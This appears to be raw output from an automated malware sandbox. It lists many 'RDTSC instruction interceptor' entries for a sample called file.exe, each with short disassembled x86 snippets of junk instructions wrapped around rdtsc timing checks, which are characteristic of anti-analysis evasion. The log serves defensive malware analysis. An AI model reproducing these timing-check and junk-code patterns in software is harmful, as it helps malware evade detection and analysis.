Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D0AF4 second address: 5D0AF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D0AF9 second address: 5D0B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D0B01 second address: 5D0B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F55E4D05126h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D0B0E second address: 5D0B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D1111 second address: 5D111D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F55E4D0512Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D13C0 second address: 5D13E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D1D2E2h 0x00000009 popad 0x0000000a jl 00007F55E4D1D2DCh 0x00000010 jg 00007F55E4D1D2D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D13E7 second address: 5D13F8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jg 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D198F second address: 5D1996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5B57 second address: 5D5B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5B5B second address: 5D5B88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F55E4D1D2D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e push esi 0x0000000f jc 00007F55E4D1D2D6h 0x00000015 jmp 00007F55E4D1D2E4h 0x0000001a pop esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5B88 second address: 5D5B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5CDC second address: 5D5CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5CE2 second address: 5D5CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F55E4D0512Ah 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5CF1 second address: 5D5D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DEh 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5E58 second address: 5D5E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5F86 second address: 5D5F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5F8A second address: 5D5F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5F95 second address: 5D5F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5F9B second address: 5D5FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F55E4D05138h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D5FBB second address: 5D5FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D6147 second address: 5D6173 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D05137h 0x00000007 jmp 00007F55E4D05131h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D6173 second address: 5D617B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D617B second address: 5D617F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D6620 second address: 5D6624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D6768 second address: 5D676F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D676F second address: 5D6775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D6775 second address: 5D6784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jo 00007F55E4D05126h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D6784 second address: 5D67A3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F55E4D1D2E5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D67A3 second address: 5D67A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DB20A second address: 5DB213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5DB213 second address: 5DB231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007F55E4D0513Dh 0x0000000b jmp 00007F55E4D05131h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5225F0 second address: 5225F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5225F4 second address: 5225F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1BB7 second address: 5E1BD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1E40 second address: 5E1E46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1E46 second address: 5E1E4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1E4A second address: 5E1E6C instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D05126h 0x00000008 jmp 00007F55E4D05138h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E1E6C second address: 5E1EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F55E4D1D2E3h 0x00000008 jno 00007F55E4D1D2D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F55E4D1D2DCh 0x00000019 jmp 00007F55E4D1D2E7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E2048 second address: 5E2064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F55E4D05135h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E2064 second address: 5E206A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E25EA second address: 5E25EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E33B7 second address: 5E33D2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D1D2D6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F55E4D1D2DBh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E33D2 second address: 5E33DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9AF9 second address: 5E9B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D1D2DFh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E9B11 second address: 5E9B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F6347 second address: 5F634B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F634B second address: 5F634F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F634F second address: 5F6370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F55E4D1D2E8h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F9BD6 second address: 5F9C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D05134h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jmp 00007F55E4D05136h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F55E4D0512Ch 0x0000001c jng 00007F55E4D05126h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F95F9 second address: 5F9610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F55E4D1D2DDh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F9610 second address: 5F9616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5F9616 second address: 5F961A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F97BC second address: 5F97CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D0512Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F97CF second address: 5F97DC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC84 second address: 5FBC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC88 second address: 5FBC93 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC93 second address: 5FBC99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBC99 second address: 5FBCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBCA3 second address: 5FBCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBCA9 second address: 5FBCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FBCB3 second address: 5FBCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB9EA second address: 5FB9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB9F2 second address: 5FB9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5FB9F9 second address: 5FBA04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F55E4D1D2D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6025EF second address: 6025F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6025F5 second address: 6025F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6055D0 second address: 6055D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6055D4 second address: 6055EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2E5h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B4EC second address: 60B515 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F55E4D0512Ch 0x00000008 jmp 00007F55E4D05134h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B515 second address: 60B526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jl 00007F55E4D1D2D6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B526 second address: 60B52C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6134E0 second address: 6134FE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F55E4D1D2D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jns 00007F55E4D1D2D6h 0x00000014 jo 00007F55E4D1D2D6h 0x0000001a pop edi 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6134FE second address: 613509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F55E4D05126h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61367D second address: 61369B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F55E4D1D2E9h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61369B second address: 6136C8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F55E4D0512Ch 0x00000008 jne 00007F55E4D05128h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F55E4D05126h 0x0000001b jmp 00007F55E4D0512Ch 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6136C8 second address: 6136CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51F024 second address: 51F032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D0512Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613B09 second address: 613B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613D92 second address: 613D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613D96 second address: 613D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 613D9A second address: 613DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F55E4D05126h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BC2F second address: 61BC43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F55E4D1D2DFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6285B3 second address: 6285BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F55E4D05126h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6283FF second address: 62842C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F55E4D1D2DAh 0x00000007 jnp 00007F55E4D1D2D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F55E4D1D2E7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62842C second address: 628432 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629CA1 second address: 629CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jg 00007F55E4D1D2D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629CAF second address: 629CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629CBA second address: 629CD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F55E4D1D2F4h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F55E4D1D2D6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 629CD2 second address: 629CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F55E4D05126h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636F74 second address: 636F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F55E4D1D2DBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64768D second address: 647693 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646C27 second address: 646C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6471B7 second address: 6471BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64A5F2 second address: 64A6AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F55E4D1D2E9h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007F55E4D1D2DFh 0x00000015 jmp 00007F55E4D1D2DAh 0x0000001a pop edx 0x0000001b push dword ptr [ebp+122D3428h] 0x00000021 movzx edx, ax 0x00000024 call 00007F55E4D1D2D9h 0x00000029 push ebx 0x0000002a pushad 0x0000002b jl 00007F55E4D1D2D6h 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 popad 0x00000034 pop ebx 0x00000035 push eax 0x00000036 push edi 0x00000037 pushad 0x00000038 push eax 0x00000039 pop eax 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d pop edi 0x0000003e mov eax, dword ptr [esp+04h] 0x00000042 jne 00007F55E4D1D2DAh 0x00000048 mov eax, dword ptr [eax] 0x0000004a pushad 0x0000004b jno 00007F55E4D1D2D8h 0x00000051 js 00007F55E4D1D2E7h 0x00000057 jmp 00007F55E4D1D2E1h 0x0000005c popad 0x0000005d mov dword ptr [esp+04h], eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 pushad 0x00000065 popad 0x00000066 jmp 00007F55E4D1D2E8h 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B825 second address: 64B829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64B829 second address: 64B868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F55E4D1D2D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F55E4D1D2DCh 0x00000012 popad 0x00000013 pushad 0x00000014 jc 00007F55E4D1D2D8h 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007F55E4D1D2E6h 0x00000021 pushad 0x00000022 push edx 0x00000023 pop edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D0C4 second address: 64D0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
